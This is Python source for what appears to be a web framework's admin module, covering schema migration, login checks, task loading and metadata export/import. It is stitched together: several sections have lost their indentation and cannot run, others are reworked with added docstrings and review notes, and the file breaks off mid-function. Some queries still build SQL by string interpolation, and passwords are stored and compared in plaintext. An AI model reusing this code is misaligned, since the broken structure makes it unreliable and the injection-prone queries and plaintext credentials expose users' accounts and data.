task.sys_lang_keys_values.add_field(6, 'f_key_str', 'Key', common.TEXT, size=1048)
task.sys_lang_keys_values.add_field(6, 'f_eng_str', 'English', common.TEXT, size=1048)
def init_item(item, id_value):
item.ID = id_value
item.soft_delete = False
item._primary_key = 'id'
item._primary_key_db_field_name = 'ID'
item._deleted_flag = 'deleted'
item._deleted_flag_db_field_name = 'DELETED'
item._master_id = ''
item._master_id_db_field_name = ''
item._master_rec_id = ''
item._master_rec_id_db_field_name = ''
if item.master:
item._master_id = 'owner_id'
item._master_id_db_field_name = 'OWNER_ID'
item._master_rec_id = 'owner_rec_id'
item._master_rec_id_db_field_name = 'OWNER_REC_ID'
item._view_list = []
item._edit_list = []
if hasattr(item, '_fields'):
for field in item._fields:
field.alignment = common.get_alignment(field.data_type, field.lookup_item, field.lookup_values)
if field.lookup_field:
field.lookup_db_field = field.lookup_field.upper()
if field.view_visible:
item._view_list.append([field.ID])
if field.edit_visible:
item._edit_list.append([field.ID])
init_item(task, 0)
init_item(task.sys_users, 1)
init_item(task.sys_roles, 2)
init_item(task.sys_items, 3)
init_item(task.sys_fields, 4)
init_item(task.sys_filters, 5)
init_item(task.item_fields, 6)
init_item(task.sys_privileges, 7)
init_item(task.role_privileges, 8)
init_item(task.sys_tasks, 9)
init_item(task.sys_indices, 10)
init_item(task.sys_params, 11)
init_item(task.sys_report_params, 12)
init_item(task.sys_code_editor, 14)
init_item(task.sys_fields_editor, 15)
init_item(task.sys_search, 16)
init_item(task.sys_field_lookups, 17)
init_item(task.sys_lookup_lists, 18)
init_item(task.sys_new_group, 19)
init_item(task.sys_languages, 20)
init_item(task.sys_countries, 21)
init_item(task.sys_langs, 22)
init_item(task.sys_lang_keys_values, 23)
task.sys_catalogs.ID = 101
task.sys_tables.ID = 102
for i in range(1, 23):
try:
item = task.item_by_ID(i)
for field in item._fields:
field_def = field.field_def
field_def[FIELD_ALIGNMENT] = field.alignment
if field.lookup_item:
field_def[LOOKUP_FIELD] = field.lookup_item._field_by_name(field.lookup_field).ID
field_def[LOOKUP_ITEM] = field.lookup_item.ID
for filter in item.filters:
if filter.field:
filter.filter_def[FILTER_FIELD_NAME] = filter.field.ID
except:
pass
def update_admin_fields(task):
    """Bring the admin SQLite schema in line with the declared items.

    For every master item that has a physical table, make sure the table
    exists and that every declared field has a matching column; missing
    columns are added with ALTER TABLE, and column-specific one-off data
    migrations are applied afterwards.
    """
    def do_updates(con, field, item_name):
        # One-off migration: when the 'owner_item' column is first added
        # to sys_privileges, grant full rights on every detail item to
        # every role so existing projects keep working.
        if item_name == 'sys_privileges' and field.field_name.lower() == 'owner_item':
            cursor = con.cursor()
            cursor.execute("SELECT ID FROM SYS_ITEMS WHERE TABLE_ID > 0 AND DELETED = 0")
            details = cursor.fetchall()
            cursor.execute("SELECT ID FROM SYS_ROLES WHERE DELETED = 0")
            roles = cursor.fetchall()
            for d in details:
                for r in roles:
                    cursor.execute("""
                        INSERT INTO SYS_PRIVILEGES
                        (DELETED, OWNER_ID, OWNER_REC_ID, ITEM_ID, F_CAN_VIEW, F_CAN_CREATE, F_CAN_EDIT, F_CAN_DELETE)
                        values (?, ?, ?, ?, ?, ?, ?, ?)""",
                        (0, 2, r[0], d[0], True, True, True, True))
            con.commit()

    def get_item_fields(item, table_name):
        # Return upper-cased column names of table_name.
        # NOTE: uses the enclosing function's 'cursor' (closure variable,
        # bound in the main body below).
        cursor.execute('PRAGMA table_info(%s)' % table_name)
        rows = cursor.fetchall()
        result = [str(row[1]).upper() for row in rows]
        return result

    def check_item_fields(item, table_name=None):
        # Add a column for every declared field missing from the table.
        if not table_name:
            table_name = item.table_name.upper()
        fields = get_item_fields(item, table_name)
        for field in item._fields:
            if not field.field_name.upper() in fields:
                sql = 'ALTER TABLE %s ADD COLUMN %s %s' % \
                    (table_name, field.field_name.upper(), \
                    task.db_module.FIELD_TYPES[field.data_type])
                print(sql)
                cursor.execute(sql)
                con.commit()
                # Run any data migration tied to the newly-added column.
                do_updates(con, field, item.item_name)

    def check_table_exists(item, table_name=None):
        # Create the table (with only an ID primary key) when absent.
        # Always returns True so the caller goes on to check columns.
        if not table_name:
            table_name = item.table_name.upper()
        sql = 'SELECT name FROM sqlite_master WHERE type="table" AND UPPER(name)="%s"' % table_name
        cursor.execute(sql)
        rows = cursor.fetchall()
        if not rows:
            sql = 'CREATE TABLE %s (ID INTEGER PRIMARY KEY)' % table_name
            cursor.execute(sql)
        return True

    con = task.create_connection()
    try:
        cursor = con.cursor()
        for group in task.items:
            for item in group.items:
                # Only master items with a physical table are checked;
                # details share their master's table.
                if item.table_name and not item.master:
                    if check_table_exists(item):
                        check_item_fields(item)
    finally:
        con.close()
def delete_reports(task):
    """Background loop: delete generated report files older than the
    configured DELETE_REPORTS_AFTER threshold (hours).

    Runs forever; intended to be started as a daemon thread by
    init_delete_reports().
    """
    while True:
        # A falsy setting disables cleanup entirely.
        if common.SETTINGS['DELETE_REPORTS_AFTER']:
            path = os.path.join(task.work_dir, 'static', 'reports')
            if os.path.isdir(path):
                for f in os.listdir(path):
                    file_name = os.path.join(path, f)
                    if os.path.isfile(file_name):
                        # Age of the file since its last modification.
                        delta = datetime.datetime.now() - datetime.datetime.fromtimestamp(os.path.getmtime(file_name))
                        hours, sec = divmod(delta.total_seconds(), 3600)
                        if hours > common.SETTINGS['DELETE_REPORTS_AFTER']:
                            os.remove(file_name)
        # Re-scan once per second.
        time.sleep(1)
def init_delete_reports(task):
    """Start the background report-cleanup loop as a daemon thread."""
    cleaner = threading.Thread(target=delete_reports, args=(task,), daemon=True)
    cleaner.start()
def read_secret_key(task):
    """Read the secret key stored in SYS_PARAMS.

    Returns '' when the table is empty or the stored value is NULL
    (the original raised IndexError on an empty SYS_PARAMS table).
    """
    con = task.create_connection()
    try:
        cursor = con.cursor()
        cursor.execute('SELECT f_secret_key FROM SYS_PARAMS')
        rec = cursor.fetchall()
    finally:
        # Read-only query: roll back so no implicit transaction lingers.
        con.rollback()
        con.close()
    # Guard against an empty table and a NULL value.
    if rec and rec[0][0] is not None:
        return rec[0][0]
    return ''
def init_admin(task):
    """Initialize the admin task: languages, item tree, schema updates
    and runtime settings read from SYS_PARAMS.

    Returns the same task object so callers can chain on it.
    """
    langs.update_langs(task)
    task.set_language(read_language(task))
    create_items(task)
    update_admin_fields(task)
    task.fields_id_lock = Lock()  # guards allocation of new field IDs
    read_setting(task)
    task.task_con_pool_size = common.SETTINGS['CON_POOL_SIZE']
    if task.task_con_pool_size < 1:
        task.task_con_pool_size = 3  # sane default when misconfigured
    try:
        task.task_mp_pool = common.SETTINGS['MP_POOL']
        task.task_persist_con = common.SETTINGS['PERSIST_CON']
    except:
        # Older settings may lack these keys; fall back to defaults.
        task.task_mp_pool = 4
        task.task_persist_con = True
    task.secret_key = read_secret_key(task)
    task.safe_mode = common.SETTINGS['SAFE_MODE']
    task.max_content_length = common.SETTINGS['MAX_CONTENT_LENGTH']
    task.timeout = common.SETTINGS['TIMEOUT']
    task.ignore_change_ip = common.SETTINGS['IGNORE_CHANGE_IP']
    task.ignore_change_uuid = True
    # Switch to the configured project language (may differ from the
    # language read at start-up above).
    task.set_language(common.SETTINGS['LANGUAGE'])
    task.item_caption = task.language('admin')
    register_events(task)
    init_fields_next_id(task)
    init_delete_reports(task)
    return task
def create_admin(app):
    """Create and initialize the built-in administrator task (SQLite)."""
    admin_task = AdminTask(app, 'admin', 'Administrator', '',
                           db_modules.SQLITE, db_database='admin.sqlite')
    # init_admin returns the task it was given.
    return init_admin(admin_task)
def db_info(task):
    """Open sys_tasks and return the project database connection settings.

    Returns an 8-tuple: (db_type, server, alias, login, password, host,
    port, encoding).
    """
    rec = task.sys_tasks.copy()
    rec.open()
    names = ('f_db_type', 'f_server', 'f_alias', 'f_login',
             'f_password', 'f_host', 'f_port', 'f_encoding')
    return tuple(getattr(rec, name).value for name in names)
def execute(task, task_id, sql, params=None):
    """Run sql against the admin db (task_id == 0) or the project db.

    Returns the error reported by the database layer (None on success).
    """
    if task_id == 0:
        # Admin database: the task object executes directly.
        _, error = task.execute(sql, params)
        return error
    # Project database: open an ad-hoc connection, run, then discard it.
    db_type, db_server, db_database, db_user, db_password, \
        db_host, db_port, db_encoding = db_info(task)
    db_module = db_modules.get_db_module(db_type)
    connection, (result_set, error) = execute_sql(
        db_module, db_server, db_database, db_user, db_password,
        db_host, db_port, db_encoding, None, sql, params)
    if connection:
        connection.rollback()
        connection.close()
    return error
def execute_ddl(task, db_sql):
    """Run DDL statements on the project database.

    Returns (success, error, info). On databases without DDL rollback,
    success stays True even when an error is reported (partial DDL may
    already have been applied).
    """
    db_type, db_server, db_database, db_user, db_password, \
        db_host, db_port, db_encoding = db_info(task)
    db_module = db_modules.get_db_module(db_type)
    connection, (result_set, error, info) = execute_sql(
        db_module, db_server, db_database, db_user, db_password,
        db_host, db_port, db_encoding, None, db_sql, ddl=True)
    success = not (db_module.DDL_ROLLBACK and error)
    if connection:
        connection.close()
    return success, error, info
def execute_select(task, task_id, sql, params=None):
    """Run a SELECT and return the result set.

    Bug fix: the original body referenced an undefined global ``task``
    (NameError at runtime); the task is now the first argument, matching
    the sibling execute()/execute_ddl() signatures. task_id and params
    are accepted for signature symmetry but are currently unused.
    """
    return task.select(sql)
def get_privileges(task, role_id):
    """Return {item_id: {'can_view'/'can_create'/'can_edit'/'can_delete'}}
    for one role."""
    privileges = task.sys_privileges.copy()
    privileges.filters.owner_rec_id.value = role_id
    privileges.open()
    return {
        rec.item_id.value: {
            'can_view': rec.f_can_view.value,
            'can_create': rec.f_can_create.value,
            'can_edit': rec.f_can_edit.value,
            'can_delete': rec.f_can_delete.value,
        }
        for rec in privileges
    }
def get_roles(task):
    """Return ([[role_id, role_name], ...], {role_id: privileges})."""
    privileges = {}
    roles = []
    role_recs = task.sys_roles.copy()
    role_recs.open()
    # NOTE: the original shadowed the dataset with its own record
    # variable ('for r in r'); distinct names are used here.
    for rec in role_recs:
        role_id = rec.id.value
        privileges[role_id] = get_privileges(task, role_id)
        roles.append([role_id, rec.f_name.value])
    return roles, privileges
def login(task, log, password, admin, ip=None, session_uuid=None):
    """Validate credentials against SYS_USERS.

    Returns a user-info dict on success, {} on failure (or when safe
    mode is off). When ip/session_uuid are supplied they are stored on
    the matched user record for later request validation.
    """
    user_info = {}
    if task.safe_mode:
        users = task.sys_users.copy()
        # Pre-filter on password; login/password are re-checked below.
        users.set_where(f_password=password)
        users.open()
        for u in users:
            if u.f_login.value.strip() == log.strip() and u.f_password.value == password:
                # When an admin login is required the flag must match.
                if not admin or u.f_admin.value == admin:
                    user_info = {
                        'user_id': u.id.value,
                        'role_id': u.f_role.value,
                        'role_name': u.f_role.display_text,
                        'user_name': u.f_name.value,
                        'admin': u.f_admin.value
                    }
                    if ip or session_uuid:
                        # Parameterized to close the SQL injection through
                        # client-supplied ip / session_uuid (the original
                        # interpolated them into the statement).
                        task.execute(
                            "UPDATE SYS_USERS SET F_IP=?, F_UUID=? WHERE ID=?",
                            (ip, session_uuid, u.id.value))
                    break
    return user_info
def user_valid_ip(task, user_id, ip):
    """True when the stored F_IP of user_id equals ip, else False."""
    rows = task.select("SELECT F_IP FROM SYS_USERS WHERE ID=%s" % user_id)
    return bool(rows) and rows[0][0] == ip
def user_valid_uuid(task, user_id, session_uuid):
    """True when the stored F_UUID of user_id equals session_uuid."""
    rows = task.select("SELECT F_UUID FROM SYS_USERS WHERE ID=%s" % user_id)
    return bool(rows) and rows[0][0] == session_uuid
def create_task(app):
    """Build the project Task object from the admin metadata.

    Raises common.ProjectNotCompleted when no project database has been
    configured yet.
    """
    admin = app.admin
    items = admin.sys_items.copy()
    items.filters.type_id.value = [common.TASK_TYPE]
    items.open()
    task_rec = admin.sys_tasks.copy()
    task_rec.open()
    # Guard clause: without a configured database the project cannot run.
    if not task_rec.f_db_type.value:
        raise common.ProjectNotCompleted()
    result = Task(app, items.f_item_name.value, items.f_name.value,
                  items.f_js_filename.value, task_rec.f_db_type.value,
                  task_rec.f_server.value, task_rec.f_alias.value,
                  task_rec.f_login.value, task_rec.f_password.value,
                  task_rec.f_host.value, task_rec.f_port.value,
                  task_rec.f_encoding.value, admin.task_con_pool_size,
                  admin.task_mp_pool, admin.task_persist_con)
    result.ID = items.id.value
    load_task(result, app)
    return result
###############################################################################
# load task #
###############################################################################
def reload_task(task):
    """Rebuild app.task from metadata, pausing request handling meanwhile."""
    if not task.app.task:
        return
    task.app.under_maintenance = True
    try:
        # Wait for in-flight requests to drain; the reload request
        # itself counts as one, hence the > 1 threshold.
        while task.app._busy > 1:
            time.sleep(0.1)
        read_setting(task)
        load_task(task.app.task, task.app, first_build=False)
        task.app.task.mod_count += 1
    finally:
        task.app.under_maintenance = False
def load_task(target, app, first_build=True, after_import=False):
    """(Re)build the project task tree *target* from the admin metadata.

    Reads sys_items / sys_fields / sys_filters / sys_report_params,
    creates groups, items, details and reports on *target*, resolves
    lookup lists, compiles server modules and wires up the optional
    history and lock items.
    """
    def create_fields(item, parent_id):
        # Add to *item* every field whose owner record is parent_id.
        # fields_dict maps owner_rec_id -> list of sys_fields record
        # numbers (built in the main body below).
        recs = fields_dict.get(parent_id)
        if recs:
            for r in recs:
                sys_fields.rec_no = r
                if sys_fields.owner_rec_id.value == parent_id:
                    # Visibility/ordering are not stored per field here;
                    # they come from the serialized interface lists.
                    view_index = -1
                    visible = False
                    word_wrap = False
                    expand = False
                    editable = False
                    edit_visible = False
                    edit_index = -1
                    field = item.add_field(sys_fields.id.value,
                        sys_fields.f_field_name.value,
                        sys_fields.f_name.value,
                        sys_fields.f_data_type.value,
                        sys_fields.f_required.value,
                        sys_fields.f_object.value,
                        sys_fields.f_object_field.value,
                        visible,
                        view_index,
                        edit_visible,
                        edit_index,
                        sys_fields.f_read_only.value,
                        expand,
                        word_wrap,
                        sys_fields.f_size.value,
                        sys_fields.f_default_value.value,
                        sys_fields.f_default.value,
                        sys_fields.f_calculated.value,
                        editable,
                        sys_fields.f_master_field.value,
                        sys_fields.f_alignment.value,
                        sys_fields.f_lookup_values.value,
                        sys_fields.f_enable_typehead.value,
                        sys_fields.f_help.value,
                        sys_fields.f_placeholder.value,
                        sys_fields.f_object_field1.value,
                        sys_fields.f_object_field2.value,
                        sys_fields.f_db_field_name.value,
                        sys_fields.f_mask.value,
                        sys_fields.f_image_edit_width.value,
                        sys_fields.f_image_edit_height.value,
                        sys_fields.f_image_view_width.value,
                        sys_fields.f_image_view_height.value,
                        sys_fields.f_image_placeholder.value,
                        sys_fields.f_image_camera.value,
                        sys_fields.f_file_download_btn.value,
                        sys_fields.f_file_open_btn.value,
                        sys_fields.f_file_accept.value
                        )

    def create_filters(item, parent_id):
        # Add the filters owned by parent_id to *item*.
        for rec in sys_filters:
            if sys_filters.owner_rec_id.value == parent_id:
                item.add_filter(
                    sys_filters.f_filter_name.value,
                    sys_filters.f_name.value,
                    sys_filters.f_field.value,
                    sys_filters.f_type.value,
                    sys_filters.f_multi_select_all.value,
                    sys_filters.f_data_type.value,
                    sys_filters.f_visible.value,
                    sys_filters.f_help.value,
                    sys_filters.f_placeholder.value,
                    sys_filters.id.value,
                    )

    def create_params(item, parent_id):
        # Add the report parameters owned by parent_id to *item*.
        for params in sys_params:
            if sys_params.owner_rec_id.value == parent_id:
                item.add_param(params.f_name.value,
                    params.f_param_name.value,
                    params.f_data_type.value,
                    params.f_object.value,
                    params.f_object_field.value,
                    params.f_required.value,
                    params.f_visible.value,
                    params.f_alignment.value,
                    params.f_multi_select.value,
                    params.f_multi_select_all.value,
                    params.f_enable_typehead.value,
                    params.f_lookup_values.value,
                    params.f_help.value,
                    params.f_placeholder.value
                    )

    def create_items(group, group_id, group_type_id):
        # Create every catalog/table/report whose parent is group_id.
        for rec in sys_items:
            if rec.parent.value == group_id:
                item = None
                add_item = None
                # The group type decides which factory creates the item.
                if group_type_id == common.ITEMS_TYPE:
                    add_item = group.add_catalog
                elif group_type_id == common.TABLES_TYPE:
                    add_item = group.add_table
                elif group_type_id == common.REPORTS_TYPE:
                    add_item = group.add_report
                if add_item:
                    item = add_item(rec.f_item_name.value,
                        rec.f_name.value,
                        rec.f_table_name.value,
                        rec.f_visible.value,
                        rec.f_view_template.value,
                        rec.f_js_filename.value,
                        rec.f_soft_delete.value)
                if item:
                    item.ID = rec.id.value
                    item.gen_name = rec.f_gen_name.value
                    item.virtual_table = rec.f_virtual_table.value
                    item.server_code = rec.f_server_module.value
                    item._keep_history = rec.f_keep_history.value
                    item.edit_lock = rec.f_edit_lock.value
                    item.select_all = rec.f_select_all.value
                    item._primary_key = rec.f_primary_key.value
                    item._deleted_flag = rec.f_deleted_flag.value
                    item._master_id = rec.f_master_id.value
                    item._master_rec_id = rec.f_master_rec_id.value
                    item._sys_id = rec.sys_id.value
                    if group_type_id != common.REPORTS_TYPE:
                        # View/edit/order/report lists are stored
                        # serialized on the current sys_items record.
                        common.load_interface(sys_items)
                        item._view_list = sys_items._view_list
                        item._edit_list = sys_items._edit_list
                        # Fields and filters can be inherited from the
                        # group as well as declared on the item itself.
                        create_fields(item, group_id)
                        create_fields(item, rec.id.value)
                        item._order_by = sys_items._order_list
                        item.rep_ids = sys_items._reports_list
                        create_filters(item, group_id)
                        create_filters(item, rec.id.value)
                    else:
                        # Reports take parameters instead of fields.
                        create_params(item, rec.id.value)
                        item.rep_ids = []

    def create_groups(parent):
        groups = []
        for rec in sys_items:
            if rec.id.value == parent:
                # This is the task's own record: copy its attributes
                # onto the target task.
                target.table_name = rec.f_table_name.value
                target.template = rec.f_view_template.value
                target.js_filename = rec.f_js_filename.value
                common.load_interface(sys_items)
                target.server_code = rec.f_server_module.value
            if rec.parent.value == parent:
                group = Group(target, target, rec.f_item_name.value, rec.f_name.value, rec.f_view_template.value,
                    rec.f_js_filename.value, rec.f_visible.value, rec.type_id.value)
                group.ID = rec.id.value
                group.server_code = rec.f_server_module.value
                groups.append((group, rec.id.value, rec.type_id.value))
        # Populate the groups only after all of them exist.
        for group in groups:
            create_items(*group)

    def create_details():
        # Attach detail items: sys_items records carrying a table_id
        # reference to an existing table item.
        for it in sys_items:
            if it.table_id.value:
                item = target.item_by_ID(it.parent.value)
                table = target.item_by_ID(it.table_id.value)
                if item and table:
                    detail = item.add_detail(table)
                    detail.item_name = it.f_item_name.value
                    detail.ID = it.id.value
                    detail.gen_name = table.gen_name
                    detail.visible = it.f_visible.value
                    detail.view_template = it.f_view_template.value
                    detail.js_filename = it.f_js_filename.value
                    detail.server_code = it.f_server_module.value
                    detail.item_type = common.ITEM_TYPES[detail.item_type_id - 1]
                    common.load_interface(sys_items)
                    detail._view_list = sys_items._view_list
                    detail._edit_list = sys_items._edit_list
                    detail._order_by = sys_items._order_list

    def process_reports():
        # Resolve each item's rep_ids into actual report objects.
        def add_reports(item):
            item.reports = []
            for rep_id in item.rep_ids:
                report = target.item_by_ID(rep_id[0])
                if report:
                    item.reports.append(report)
        for group in target.items:
            for item in group.items:
                add_reports(item)

    def process_lookup_lists():
        # Deserialize the shared lookup lists into target.lookup_lists.
        lists = task.sys_lookup_lists.copy()
        lists.open(order_by=['f_name'])
        for l in lists:
            text = l.f_lookup_values_text.value  # NOTE(review): unused local, kept as-is
            target.lookup_lists[l.id.value] = json.loads(l.f_lookup_values_text.value)

    def remove_attr(target):
        # Reset attributes added by a previous compile: callables that
        # exist in init_dict are restored to their initial value, any
        # attribute missing from init_dict (KeyError below) is deleted.
        for key in list(iterkeys(target.__dict__)):
            try:
                value = target.init_dict[key]
                if hasattr(target.__dict__[key], '__call__'):
                    target.__dict__[key] = value
            except:
                del target.__dict__[key]

    def history_on_apply(item, delta, params):
        # The history item is read-only from client code.
        raise Exception('Changing of history is not allowed.')

    # Recreate the connection pool before rebuilding the tree.
    target.pool.dispose()
    target.pool.recreate()
    task = app.admin
    remove_attr(target)
    target.items = []
    sys_fields = task.sys_fields.copy()
    sys_fields.open(order_by=['id'])
    # Index sys_fields record numbers by owner to speed up create_fields.
    fields_dict = {}
    for f in sys_fields:
        d = fields_dict.get(f.owner_rec_id.value, [])
        if not d:
            fields_dict[f.owner_rec_id.value] = d
        d.append(f.rec_no)
    sys_filters = task.sys_filters.copy()
    sys_filters.open(order_by=['f_index'])
    sys_params = task.sys_report_params.copy()
    sys_params.open(order_by=['f_index'])
    sys_items = task.sys_items.copy()
    sys_items.details_active = False
    sys_items.open(order_by=['f_index'])
    create_groups(target.ID)
    create_details()
    process_reports()
    process_lookup_lists()
    target.bind_items()
    target.compile_all()
    target.lang = task.lang
    target.locale = task.locale
    # Wire up the optional history and lock items from SYS_PARAMS.
    params = task.sys_params.copy()
    params.open(fields=['f_history_item', 'f_lock_item'])
    target.history_item = None
    if params.f_history_item.value:
        target.history_item = target.item_by_ID(params.f_history_item.value)
        target.history_item.on_apply = history_on_apply
    if params.f_lock_item.value:
        target.lock_item = target.item_by_ID(params.f_lock_item.value)
    target.first_build = first_build
    target.after_import = after_import
    if target.on_created:
        target.on_created(target)
    sys_fields.free()
    sys_filters.free()
    sys_params.free()
    sys_items.free()
    # Remove stale exported archives from previous sessions.
    internal_path = os.path.join(task.work_dir, 'static', '_internal')
    if os.path.exists(internal_path):
        try:
            shutil.rmtree(internal_path)
        except:
            pass
#
###############################################################################
# task #
###############################################################################
def server_check_connection(task, db_type, database, user, password, host, port, encoding, server):
    """Try to open (and immediately close) a database connection.

    Returns '' on success or when db_type is falsy, otherwise the error
    message text.
    """
    if not db_type:
        return ''
    try:
        db_module = db_modules.get_db_module(db_type)
        connection = db_module.connect(database, user, password, host, port, encoding, server)
        if connection:
            connection.close()
    except Exception as e:
        return str(e)
    return ''
def server_set_task_name(task, f_name, f_item_name):
    """Rename the project task item and drop the cached task object."""
    task_rec = task.sys_tasks.copy()
    task_rec.open()
    items = task.sys_items.copy(handlers=False)
    items.set_where(type_id=common.TASK_TYPE)
    items.open()
    items.edit()
    items.f_name.value = f_name
    items.f_item_name.value = f_item_name
    items.post()
    items.apply()
    # Force the project task to be rebuilt on next access.
    task.app.task = None
def server_set_project_langage(task, lang):
    """Switch the project language.

    Re-reads the settings, renames every item to its translated caption
    and localizes the ``__$_key_$__`` placeholders found in index.html.
    (The typo in the function name is part of the public API.)
    """
    common.SETTINGS['LANGUAGE'] = lang
    task.set_language(lang)
    write_setting(task)
    read_setting(task)
    create_items(task)
    items = task.sys_items.copy()
    items.open()
    for it in items:
        it.edit()
        try:
            # Some item names may have no translation; keep the old name.
            it.f_name.value = task.language(it.f_item_name.value)
        except Exception as e:
            traceback.print_exc()
        it.post()
        it.apply()
    file_name = 'index.html'
    data = file_read(file_name)
    # Collect every __$_key_$__ placeholder together with its key.
    start = data.find('__$_')
    label_list = []
    while start > -1:
        end = data.find('_$__', start)
        if end != -1:
            search = data[start:end+4]
            replace = data[start +4:end]
            label_list.append((search, replace))
        start = data.find('__$_', end)
    for search, replace in label_list:
        try:
            data = data.replace(search, task.language(replace))
        except:
            # Missing translation: leave the placeholder untouched.
            pass
    file_write(file_name, data)
    register_events(task)
# ~ def server_change_secret_key(task):
# ~ from base64 import b64encode
# ~ result = False
# ~ key = b64encode(os.urandom(20)).decode('utf-8')
# ~ con = task.create_connection()
# ~ try:
# ~ cursor = con.cursor()
# ~ cursor.execute("UPDATE SYS_PARAMS SET F_SECRET_KEY='%s'" % key)
# ~ con.commit()
# ~ task.secret_key = key
# ~ task.app.task_server_modified = True
# ~ result = True
# ~ except:
# ~ con.rollback()
# ~ finally:
# ~ con.close()
# ~ return result
def server_update_has_children(task):
    """Recompute and persist the has_children flag of every sys_items row."""
    container_types = (common.ROOT_TYPE, common.USERS_TYPE, common.ROLES_TYPE,
                       common.TASKS_TYPE, common.ITEMS_TYPE,
                       common.TABLES_TYPE, common.REPORTS_TYPE)
    has_children = {}
    items = task.sys_items.copy(handlers=False)
    items.open()
    for rec in items:
        # Any referenced parent has children; container types always do.
        has_children[rec.parent.value] = True
        if rec.type_id.value in container_types:
            has_children[rec.id.value] = True
    for rec in items:
        flag = has_children.get(rec.id.value)
        if not flag:
            flag = False
            has_children[rec.id.value] = False
        # Only touch records whose stored flag actually changed.
        if rec.has_children.value != flag:
            rec.edit()
            rec.has_children.value = flag
            rec.post()
    items.apply()
def server_export_task(task, task_id, url=None):
    """Export the project metadata plus client-side files as a zip archive.

    When *url* is given the archive is published under static/_internal
    and its download URL is returned; otherwise the archive content (as
    read by file_read) is returned directly.
    """
    def add_item(item):
        # Dump one admin table: field name list plus the raw dataset.
        table = item.copy(handlers=False)
        table.open()
        fields = []
        for field in table.fields:
            fields.append(field.field_name)
        result[item.item_name] = {'fields': fields, 'records': table.dataset}
    result = {}
    result['db_type'] = get_db_type(task)
    add_item(task.sys_items)
    add_item(task.sys_fields)
    add_item(task.sys_indices)
    add_item(task.sys_filters)
    add_item(task.sys_report_params)
    add_item(task.sys_roles)
    add_item(task.sys_params)
    add_item(task.sys_privileges)
    add_item(task.sys_lookup_lists)
    task_file = 'task.dat'
    file_name = 'task.zip'
    zip_file_name = os.path.join(task.work_dir, file_name)
    try:
        # Serialize the metadata, then pack it with the project files.
        with open(task_file, 'w') as f:
            json.dump(result, f)
        with zipfile.ZipFile(zip_file_name, 'w', zipfile.ZIP_DEFLATED) as zip_file:
            zip_file.write(task_file)
            common.zip_html(zip_file)
            common.zip_dir('js', zip_file)
            common.zip_dir('css', zip_file)
            common.zip_dir(os.path.join('static', 'img'), zip_file)
            common.zip_dir(os.path.join('static', 'js'), zip_file)
            common.zip_dir(os.path.join('static', 'css'), zip_file)
            common.zip_dir(os.path.join('static', 'fonts'), zip_file)
            common.zip_dir(os.path.join('static', 'builder'), zip_file)
            common.zip_dir('utils', zip_file, exclude_ext=['.pyc'])
            common.zip_dir('reports', zip_file, exclude_ext=['.xml', '.ods#'], recursive=True)
        if url:
            items = task.sys_items.copy()
            items.set_where(id=task_id)
            items.open()
            result_path = os.path.join(task.work_dir, 'static', '_internal')
            if not os.path.exists(result_path):
                os.makedirs(result_path)
            # The file name encodes project name, project version, jam
            # version and a timestamp so exports never collide.
            result_file = '%s_%s_%s_%s.zip' % (items.f_item_name.value, common.SETTINGS['VERSION'],
                task.app.jam_version, datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
            os.rename(to_unicode(file_name, 'utf-8'), os.path.join(to_unicode(result_path, 'utf-8'), to_unicode(result_file, 'utf-8')))
            result = '%s/static/_internal/%s' % (url, result_file)
        else:
            result = file_read(file_name)
    finally:
        # Always clean up the temporary files, even on failure.
        if os.path.exists(task_file):
            os.remove(task_file)
        if os.path.exists(file_name):
            os.remove(file_name)
    return result
def server_import_task(task, task_id, file_name, from_client=False):
    """Delegate a metadata import to the application object."""
    app = task.app
    return app.import_metadata(task, task_id, file_name, from_client)
def import_metadata(task, task_id, file_name, from_client=False):
def refresh_old_item(item):
item = item.copy(handlers=False)
item.open(expanded=False)
old_dict[item.item_name] = item
def get_dataset(item, data_lists):
ns = []
ds = []
dl = data_lists.get(item.item_name)
if dl:
field_names = data_lists[item.item_name]['fields']
dataset = data_lists[item.item_name]['records']
for d in dataset:
ds.append([])
for i, f in enumerate(field_names):
if item.field_by_name(f):
ns.append(f)
for j, d in enumerate(dataset):
ds[j].append(dataset[j][i])
else:
for f in item.fields:
ns.append(f.field_name)
return ns, ds
def get_items(dir):
file_name = os.path.join(dir, 'task.dat')
data = file_read(file_name)
data_lists = json.loads(data)
new_items = {}
old_items = {}
items = [task.sys_items, task.sys_fields, task.sys_indices, task.sys_filters, \
task.sys_report_params, task.sys_roles, task.sys_params, task.sys_privileges, \
task.sys_lookup_lists]
for item in items:
task.execute('DELETE FROM "%s" WHERE "DELETED" = 1' % item.table_name)
old_item = item.copy(handlers=False)
old_item.soft_delete = False
old_item.open(expanded=False)
field_names, dataset = get_dataset(old_item, data_lists)
new_item = item.copy(handlers=False)
new_item.open(expanded=False, fields=field_names, open_empty=True)
new_item._dataset = dataset
new_items[item.item_name] = new_item
old_items[item.item_name] = old_item
os.remove(file_name)
db_type = data_lists.get('db_type')
if not db_type:
db_type = get_db_type(task)
return new_items, old_items, db_type
def can_copy_field(field):
if field.owner.item_name == 'sys_params':
if field.field_name in ['f_safe_mode', 'f_debugging']:
return False
return True
def copy_record(old, new):
for old_field in old.fields:
if can_copy_field(old_field):
new_field = new.field_by_name(old_field.field_name)
if new_field:
old_field.value = new_field.raw_value
def compare_items(old, new, owner_id=None):
result = {}
for it in old:
result[it.id.value] = [True, False]
for it in new:
if not owner_id or owner_id == it.owner_rec_id.value:
info = result.get(it.id.value)
if info:
info[1] = True
else:
result[it.id.value] = [False, True]
return result
def check_items():
errors = []
new = new_dict['sys_items']
old = old_dict['sys_items']
compare = compare_items(old, new)
for it in old:
o, n = compare[old.id.value]
if o and n:
new.locate('id', old.id.value)
if old.type_id.value != new.type_id.value:
errors.append('Items with ID %s (<b>%s</b>, <b>%s</b>) have different type values' % \
(old.id.value, old.f_item_name.value, new.f_item_name.value))
elif old.f_table_name.value and old.f_table_name.value.upper() != new.f_table_name.value.upper():
errors.append('Items with ID %s (<b>%s</b>, <b>%s</b>) have different database tables (<b>%s</b>, <b>%s</b>)' % \
(old.id.value, old.f_item_name.value, new.f_item_name.value, old.f_table_name.value, new.f_table_name.value))
error = ",<br>".join(errors)
if error:
error = '<div class="text-error">%s</div>' % error
return error
def update_item(item_name, detail_name=None, options=['update', 'insert', 'delete'], owner=None):
new = new_dict[item_name]
if owner:
old = owner.detail_by_name(item_name)
old.open(expanded=False)
else:
old = old_dict[item_name]
owner_id = None
if owner:
owner_id = owner.id.value
compare = compare_items(old, new, owner_id)
if 'delete' in options:
old.first()
while not old.eof():
if not owner_id or owner_id == old.owner_rec_id.value:
